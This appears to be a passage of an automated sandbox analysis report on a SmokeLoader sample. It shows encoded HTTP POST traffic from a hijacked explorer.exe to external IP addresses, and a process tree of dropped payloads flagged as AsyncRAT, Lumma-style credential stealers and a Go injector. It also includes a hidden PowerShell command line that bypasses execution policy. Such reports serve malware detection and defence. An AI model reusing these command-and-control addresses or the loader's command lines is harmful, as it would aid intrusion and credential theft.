2024-07-27 05:46:54 UTC	1122	OUT	Data Raw: 6c 78 41 2f 6c 4a 39 52 53 45 6c 5a 7a 65 75 58 54 66 4e 59 53 43 43 78 6f 33 47 72 34 77 37 58 64 79 32 6e 38 7a 6f 4b 52 57 32 42 57 75 6c 65 6a 75 63 48 4a 52 42 72 2f 68 78 42 37 6c 6a 72 41 55 65 43 39 61 42 6c 49 36 4b 59 77 72 2f 30 65 4b 73 4d 4b 4a 53 34 4c 67 68 2f 56 61 74 37 77 79 66 71 42 6a 74 6e 57 73 61 74 53 44 56 66 71 2b 37 4b 33 44 48 2b 35 64 4c 37 57 64 65 70 64 65 6f 4c 77 6a 64 33 38 69 44 2f 38 66 7a 70 36 36 58 50 35 33 36 63 33 41 54 59 47 67 47 31 4b 79 31 44 70 55 2b 6f 4a 34 52 31 53 67 59 71 51 6f 73 31 66 45 7a 75 42 6f 2f 63 36 53 55 6b 43 6d 69 4b 37 35 6e 4d 50 57 53 30 62 57 7a 41 38 76 6a 54 48 72 54 76 73 54 54 45 64 58 7a 36 74 6b 33 71 5a 5a 4d 48 6d 4c 46 73 35 43 52 6e 63 35 41 6e 54 75 37 6d 78 68 38 6b 4c 4a 66 Data Ascii: lxA/lJ9RSElZzeuXTfNYSCCxo3Gr4w7Xdy2n8zoKRW2BWulejucHJRBr/hxB7ljrAUeC9aBlI6KYwr/0eKsMKJS4Lgh/Vat7wyfqBjtnWsatSDVfq+7K3DH+5dL7WdepdeoLwjd38iD/8fzp66XP536c3ATYGgG1Ky1DpU+oJ4R1SgYqQos1fEzuBo/c6SUkCmiK75nMPWS0bWzA8vjTHrTvsTTEdXz6tk3qZZMHmLFs5CRnc5AnTu7mxh8kLJf
2024-07-27 05:46:55 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:55 UTC	685	IN	Data Raw: 6f 61 39 46 6f 77 54 46 6a 66 52 2b 57 65 37 4a 2b 56 52 50 2f 44 65 78 37 52 54 41 31 77 63 39 47 50 69 66 50 42 4b 79 56 58 33 54 38 63 45 6b 58 54 70 70 4e 68 38 5a 77 4c 71 73 45 49 52 76 78 66 43 6d 39 30 55 56 4e 48 75 56 66 38 66 75 36 42 51 44 35 31 75 38 70 50 2f 7a 31 48 48 6c 72 65 6e 42 5a 36 52 31 48 6a 67 64 4a 63 73 30 6d 42 73 43 78 58 48 4e 44 4e 33 6b 43 4d 35 74 47 71 61 70 4d 39 65 36 47 78 6f 6e 56 4d 7a 59 68 69 70 2f 63 73 6d 47 4d 4c 62 2b 65 6a 4b 70 32 4b 42 78 31 34 79 34 73 2f 77 57 34 43 6f 73 2b 31 59 32 6c 38 6e 66 45 30 51 43 51 37 54 71 68 30 54 52 73 55 4c 57 30 57 58 67 65 54 5a 65 42 46 37 48 6e 62 64 4b 73 47 68 4a 69 70 52 38 59 72 6a 66 7a 36 69 32 52 36 59 30 32 56 63 58 61 45 54 4b 4e 45 6c 59 4a 7a 53 33 72 57 4b Data Ascii: oa9FowTFjfR+We7J+VRP/Dex7RTA1wc9GPifPBKyVX3T8cEkXTppNh8ZwLqsEIRvxfCm90UVNHuVf8fu6BQD51u8pP/z1HHlrenBZ6R1HjgdJcs0mBsCxXHNDN3kCM5tGqapM9e6GxonVMzYhip/csmGMLb+ejKp2KBx14y4s/wW4Cos+1Y2l8nfE0QCQ7Tqh0TRsULW0WXgeTZeBF7HnbdKsGhJipR8Yrjfz6i2R6Y02VcXaETKNElYJzS3rWK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	62399	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:56 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:56 UTC	1122	OUT	Data Raw: 6d 6f 75 53 61 67 76 7a 54 2b 36 39 73 53 59 74 51 36 71 55 43 33 66 6e 4d 6f 55 55 50 4c 4d 5a 54 32 35 59 71 43 64 72 78 30 35 56 63 6f 76 59 76 33 61 61 33 30 6a 6c 30 61 39 73 51 70 74 53 56 4a 55 61 6d 6d 73 68 4a 37 37 38 56 7a 52 7a 5a 2b 57 35 53 79 62 76 39 52 4e 61 62 63 78 47 56 4e 75 4b 50 53 57 4d 73 2f 49 6f 67 54 43 68 35 6e 2b 55 33 6c 46 6b 6c 4c 54 58 64 68 6d 37 4b 38 58 2f 56 2b 53 44 4f 4c 6a 46 72 42 37 6e 48 4c 6c 48 78 62 46 73 54 39 55 52 68 50 73 61 2f 4c 69 4c 4e 33 61 78 31 47 42 37 68 31 77 6e 67 39 58 36 2b 4f 30 4d 4a 35 4c 2f 64 31 2b 36 38 63 4e 49 39 57 4b 42 46 71 65 43 2b 42 42 6e 72 44 46 35 31 71 36 4b 73 70 55 2b 31 42 59 69 2b 34 2f 38 66 77 6e 67 55 30 59 45 47 2b 6a 71 55 70 2f 37 6c 67 2b 35 6e 33 55 50 55 62 66 Data Ascii: mouSagvzT+69sSYtQ6qUC3fnMoUUPLMZT25YqCdrx05VcovYv3aa30jl0a9sQptSVJUammshJ778VzRzZ+W5Sybv9RNabcxGVNuKPSWMs/IogTCh5n+U3lFklLTXdhm7K8X/V+SDOLjFrB7nHLlHxbFsT9URhPsa/LiLN3ax1GB7h1wng9X6+O0MJ5L/d1+68cNI9WKBFqeC+BBnrDF51q6KspU+1BYi+4/8fwngU0YEG+jqUp/7lg+5n3UPUbf
2024-07-27 05:46:58 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:57 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:58 UTC	685	IN	Data Raw: 55 34 57 42 79 47 75 62 56 53 68 30 52 51 7a 48 44 68 44 33 67 6a 31 42 37 31 74 6d 47 44 58 43 47 5a 52 43 65 71 57 66 63 57 71 57 2b 7a 79 7a 46 75 51 50 52 76 67 59 30 5a 6e 74 42 67 55 4f 70 2f 6f 38 4f 32 33 76 39 6f 44 6a 59 6e 33 69 50 6c 71 68 44 79 44 78 4a 45 54 74 59 78 66 7a 36 77 65 65 59 2b 34 4d 76 63 6a 75 53 79 62 2b 44 2f 58 45 6e 6c 49 77 78 68 69 67 43 45 33 64 64 50 48 41 78 79 44 52 4e 44 70 69 6e 52 52 4b 73 47 51 38 47 33 33 69 56 62 70 43 41 39 58 70 41 62 54 35 43 32 74 63 41 2b 58 61 34 47 4e 4c 7a 49 71 48 55 53 45 49 78 64 55 78 62 6c 2b 55 73 4e 53 6d 35 47 75 45 4d 2b 4d 58 4f 38 51 6b 33 49 50 4e 56 36 4c 58 57 59 66 32 7a 67 4e 49 64 48 41 59 59 34 6e 63 5a 66 5a 50 44 51 72 33 53 46 57 77 2f 62 65 49 33 2b 69 6d 6b 42 4c Data Ascii: U4WByGubVSh0RQzHDhD3gj1B71tmGDXCGZRCeqWfcWqW+zyzFuQPRvgY0ZntBgUOp/o8O23v9oDjYn3iPlqhDyDxJETtYxfz6weeY+4MvcjuSyb+D/XEnlIwxhigCE3ddPHAxyDRNDpinRRKsGQ8G33iVbpCA9XpAbT5C2tcA+Xa4GNLzIqHUSEIxdUxbl+UsNSm5GuEM+MXO8Qk3IPNV6LXWYf2zgNIdHAYY4ncZfZPDQr3SFWw/beI3+imkBL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	62400	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:59 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:46:59 UTC	1267	OUT	Data Raw: 48 4b 78 69 45 51 39 67 36 4c 32 51 49 68 31 4a 72 43 49 4d 2b 37 35 36 43 33 5a 45 46 69 50 57 75 41 76 4e 72 68 4e 47 4d 52 38 35 65 41 5a 4b 2b 6b 5a 30 52 77 70 75 78 2f 35 46 6d 76 4f 31 6a 55 4a 6b 2b 53 46 30 75 6c 71 62 48 63 7a 7a 70 64 30 31 62 67 36 6c 6c 6e 32 65 72 6f 4e 46 66 64 74 6c 2b 67 74 63 72 48 4f 58 45 47 59 37 47 79 6b 4e 6c 6a 39 37 54 6b 31 68 47 57 64 35 4c 73 64 7a 66 7a 30 72 73 79 49 34 41 5a 44 6a 78 31 30 42 38 4e 46 46 58 45 4f 41 44 50 50 30 2b 78 33 31 61 66 31 39 7a 56 70 7a 50 4e 48 67 72 76 64 67 53 35 50 33 36 50 6d 69 4e 66 46 4f 54 74 77 76 38 6d 51 69 51 43 6b 65 53 31 7a 4b 64 46 6e 41 2f 4d 4f 53 66 30 77 67 78 4e 75 72 70 78 6d 45 79 54 74 78 67 61 73 5a 66 68 63 30 41 37 6e 71 4b 79 7a 6b 48 63 56 42 37 6d 69 Data Ascii: HKxiEQ9g6L2QIh1JrCIM+756C3ZEFiPWuAvNrhNGMR85eAZK+kZ0Rwpux/5FmvO1jUJk+SF0ulqbHczzpd01bg6lln2eroNFfdtl+gtcrHOXEGY7GykNlj97Tk1hGWd5Lsdzfz0rsyI4AZDjx10B8NFFXEOADPP0+x31af19zVpzPNHgrvdgS5P36PmiNfFOTtwv8mQiQCkeS1zKdFnA/MOSf0wgxNurpxmEyTtxgasZfhc0A7nqKyzkHcVB7mi
2024-07-27 05:47:00 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:47:00 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:47:00 UTC	685	IN	Data Raw: 4b 73 4f 36 6e 72 65 35 57 39 74 57 79 43 57 42 47 30 4c 39 59 56 63 70 37 6a 2f 2f 36 53 2f 65 4e 6c 72 31 4a 54 70 62 52 6f 79 47 63 78 4d 77 74 2f 48 70 30 34 59 2f 6a 6b 52 54 4c 72 59 30 6d 45 62 37 70 53 6b 65 6d 77 46 37 55 32 7a 44 57 65 41 2f 34 53 72 46 6c 4e 73 4a 71 75 73 70 2f 6f 44 66 36 53 72 6e 7a 56 52 72 52 57 41 35 5a 52 73 2f 50 63 47 34 61 5a 31 32 7a 4e 62 4c 64 66 41 2b 52 6a 6d 34 76 63 50 6b 75 4a 78 34 59 34 62 4d 42 41 61 68 66 39 4a 41 54 67 52 39 33 78 51 6a 39 4e 77 59 69 52 36 37 51 31 4d 6e 71 57 46 53 4d 6e 74 76 7a 4f 6d 4d 75 6f 4f 57 74 2b 54 5a 31 61 79 63 73 30 4c 4f 67 4e 42 48 51 36 35 35 31 58 30 64 64 6a 2f 56 75 7a 52 66 2f 4f 36 65 38 50 31 4e 50 43 6b 38 32 75 45 59 61 42 39 51 48 36 73 79 4c 71 66 4f 6c 41 5a Data Ascii: KsO6nre5W9tWyCWBG0L9YVcp7j//6S/eNlr1JTpbRoyGcxMwt/Hp04Y/jkRTLrY0mEb7pSkemwF7U2zDWeA/4SrFlNsJqusp/oDf6SrnzVRrRWA5ZRs/PcG4aZ12zNbLdfA+Rjm4vcPkuJx4Y4bMBAahf9JATgR93xQj9NwYiR67Q1MnqWFSMntvzOmMuoOWt+TZ1aycs0LOgNBHQ6551X0ddj/VuzRf/O6e8P1NPCk82uEYaB9QH6syLqfOlAZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	62401	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:47:00 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:47:00 UTC	1122	OUT	Data Raw: 58 51 63 64 48 52 62 4a 47 61 78 53 4b 41 47 45 71 71 6b 36 48 44 52 44 6a 5a 52 45 55 47 4b 48 61 49 51 2f 46 6a 54 6a 33 42 56 55 73 54 38 57 45 35 45 73 69 41 35 67 65 73 2b 56 4a 56 6b 31 50 33 55 35 47 36 70 4b 56 32 53 64 44 34 6d 76 70 4c 66 54 71 55 77 72 47 37 65 6c 6f 32 6b 69 62 50 31 56 74 49 4d 6c 66 38 34 72 45 6e 41 66 62 61 69 79 7a 67 77 4e 38 6c 4f 64 4d 35 4d 51 68 75 67 70 57 37 31 69 36 74 74 70 39 33 5a 36 78 68 52 51 79 53 51 44 35 39 6c 68 37 56 69 47 30 4c 46 34 71 6d 44 74 68 4a 71 31 66 39 38 65 48 49 71 70 33 43 6e 47 48 59 77 6f 68 4b 75 76 7a 34 71 4e 73 5a 79 4d 65 43 62 65 42 6f 7a 57 68 34 35 56 58 30 6f 38 49 5a 54 73 32 69 55 32 63 39 67 44 50 36 76 6d 6b 56 4f 7a 72 51 7a 45 78 68 56 55 4b 44 51 76 56 59 2b 57 6a 5a 4f Data Ascii: XQcdHRbJGaxSKAGEqqk6HDRDjZREUGKHaIQ/FjTj3BVUsT8WE5EsiA5ges+VJVk1P3U5G6pKV2SdD4mvpLfTqUwrG7elo2kibP1VtIMlf84rEnAfbaiyzgwN8lOdM5MQhugpW71i6ttp93Z6xhRQySQD59lh7ViG0LF4qmDthJq1f98eHIqp3CnGHYwohKuvz4qNsZyMeCbeBozWh45VX0o8IZTs2iU2c9gDP6vmkVOzrQzExhVUKDQvVY+WjZO
2024-07-27 05:47:02 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:47:01 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:47:02 UTC	685	IN	Data Raw: 6f 56 49 49 76 32 43 77 6e 2b 31 30 4a 54 2f 42 4c 5a 30 39 6e 75 79 6b 2f 70 56 47 78 42 36 39 30 7a 6f 6a 46 69 72 58 6c 6a 77 6c 6d 54 47 50 71 69 57 61 6c 6b 64 44 70 52 64 66 55 6e 31 62 37 30 77 4a 49 77 6f 6d 4a 4f 6f 72 4c 59 62 69 74 56 7a 2f 7a 6f 75 33 56 46 63 56 67 2b 4c 4a 49 54 6b 69 62 61 51 52 38 2b 54 35 4c 57 69 4a 4d 66 52 68 41 37 4d 51 75 48 59 55 6b 6d 7a 68 71 41 35 6b 63 45 37 31 43 44 6a 35 4d 53 52 36 70 32 42 38 58 4b 74 53 79 50 4b 44 44 31 5a 32 67 49 64 39 42 55 33 54 42 4f 45 70 33 61 77 53 45 6c 7a 2b 30 71 70 42 74 6e 74 6e 73 61 59 73 75 46 4e 4c 4c 49 34 58 75 6e 4c 78 53 53 79 57 35 70 45 2f 68 68 5a 57 68 70 65 47 42 70 6f 54 73 64 62 51 74 30 49 6e 4b 57 67 54 55 79 44 58 52 42 7a 59 57 71 51 54 36 6e 62 75 78 4c 49 Data Ascii: oVIIv2Cwn+10JT/BLZ09nuyk/pVGxB690zojFirXljwlmTGPqiWalkdDpRdfUn1b70wJIwomJOorLYbitVz/zou3VFcVg+LJITkibaQR8+T5LWiJMfRhA7MQuHYUkmzhqA5kcE71CDj5MSR6p2B8XKtSyPKDD1Z2gId9BU3TBOEp3awSElz+0qpBtntnsaYsuFNLLI4XunLxSSyW5pE/hhZWhpeGBpoTsdbQt0InKWgTUyDXRBzYWqQT6nbuxLI

Target ID:	0
Start time:	01:42:53
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe"
Imagebase:	0x400000
File size:	41'369 bytes
MD5 hash:	ECCDCA95898D2ECCE04660FAD1209C1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:42:58
Start date:	27/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	01:43:18
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Roaming\adjijwj
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\adjijwj
Imagebase:	0x400000
File size:	41'369 bytes
MD5 hash:	ECCDCA95898D2ECCE04660FAD1209C1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:43:56
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\8EC7.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\8EC7.exe
Imagebase:	0x7ff6415f0000
File size:	988'672 bytes
MD5 hash:	2B3ECC21382E825D6FE0812A717717EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:43:56
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:44:10
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\EF14.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\EF14.exe
Imagebase:	0x7ff71bc40000
File size:	11'672'576 bytes
MD5 hash:	D3785ED170CDB1F4784D3DFF3A61DAE0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000009.00000002.2570610433.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000009.00000000.2414575122.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\EF14.exe, Author: Joe Security
Antivirus matches:	Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:44:15
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\2D42.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\2D42.exe
Imagebase:	0x1e0003b0000
File size:	141'944 bytes
MD5 hash:	B6A1C0998D0A7979C9EC17B8D5CF8A81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:44:16
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\2D42.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\2D42.exe" -HOSTRUNAS
Imagebase:	0x15f3a2d0000
File size:	141'944 bytes
MD5 hash:	B6A1C0998D0A7979C9EC17B8D5CF8A81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:44:22
Start date:	27/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:44:23
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:44:23
Start date:	27/07/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Imagebase:	0x4d0000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2639948784.0000000003385000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000003.2641040146.000000000339A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:44:31
Start date:	27/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Imagebase:	0x7ff6a2810000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:44:31
Start date:	27/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Imagebase:	0x7ff6a2810000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:44:31
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
Wow64 process (32bit):	true
Commandline:	"vm.exe"
Imagebase:	0x400000
File size:	40'376 bytes
MD5 hash:	F1B14F71252DE9AC763DBFBFBFC8C2DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000013.00000002.4107139559.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	01:44:31
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
Wow64 process (32bit):	true
Commandline:	"lm.exe"
Imagebase:	0x400000
File size:	40'376 bytes
MD5 hash:	F1B14F71252DE9AC763DBFBFBFC8C2DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2719411420.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2718324316.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2763564207.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2707939700.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2721074628.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2711751965.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2709067186.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2748207856.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2722685463.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2773942055.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2710272272.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2775761675.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2775010312.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2718700898.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2732789726.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2727794367.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2745784061.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2719069820.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2728924066.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2750455743.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: 